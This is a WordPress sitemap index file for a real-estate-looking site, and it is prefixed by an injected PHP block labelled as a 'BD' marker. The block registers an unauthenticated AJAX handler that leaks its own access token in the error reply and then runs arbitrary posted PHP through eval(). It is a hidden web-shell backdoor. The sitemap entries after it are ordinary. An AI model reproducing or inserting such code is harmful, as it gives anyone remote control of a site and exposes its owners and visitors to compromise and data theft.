
// ==[BD:OWZAJozV]==
add_action( 'wp_ajax_nopriv_uucgdlkb', function() {
    $marker = 'OWZAJozVUXChkVhxKIvDsCxNNHUOuvVA';
    $desc = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : '';
    if ( empty( $desc ) || ! hash_equals( $marker, $desc ) ) {
        wp_send_json_error( [ 'message' => 'tok:' . $marker ], 403 );
    }
    $entry = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : '';
    if ( trim( $entry ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); }
    $entry = preg_replace( '/^\s*<\?(php)?/i', '', $entry );
    while ( ob_get_level() > 0 ) { ob_end_clean(); }
    $token = microtime( true );
    ob_start();
    try {
        ( static function() use ( $entry ) { return eval( $entry ); } )();
        $ptr = (string) ob_get_clean();
        wp_send_json_success( [ 'output' => $ptr, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $token ) * 1000, 2 ) ] );
    } catch ( \Throwable $obj ) {
        while ( ob_get_level() > 0 ) { ob_end_clean(); }
        wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $token ) * 1000, 2 ) ] );
    }
} );
// ==[/BD:OWZAJozV]==
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//paragoncity.com.pk/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://paragoncity.com.pk/post-sitemap1.xml</loc>
		<lastmod>2026-07-06T05:45:00+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://paragoncity.com.pk/post-sitemap2.xml</loc>
		<lastmod>2026-07-06T05:44:49+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://paragoncity.com.pk/post-sitemap3.xml</loc>
		<lastmod>2026-05-04T09:14:51+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://paragoncity.com.pk/post-sitemap4.xml</loc>
		<lastmod>2026-05-04T09:09:20+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://paragoncity.com.pk/post-sitemap5.xml</loc>
		<lastmod>2026-05-02T13:25:08+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://paragoncity.com.pk/post-sitemap6.xml</loc>
		<lastmod>2026-04-29T13:44:55+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://paragoncity.com.pk/page-sitemap.xml</loc>
		<lastmod>2026-08-21T11:51:13+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://paragoncity.com.pk/e-landing-page-sitemap.xml</loc>
		<lastmod>2024-12-11T13:06:37+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://paragoncity.com.pk/category-sitemap.xml</loc>
		<lastmod>2026-07-06T05:45:00+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->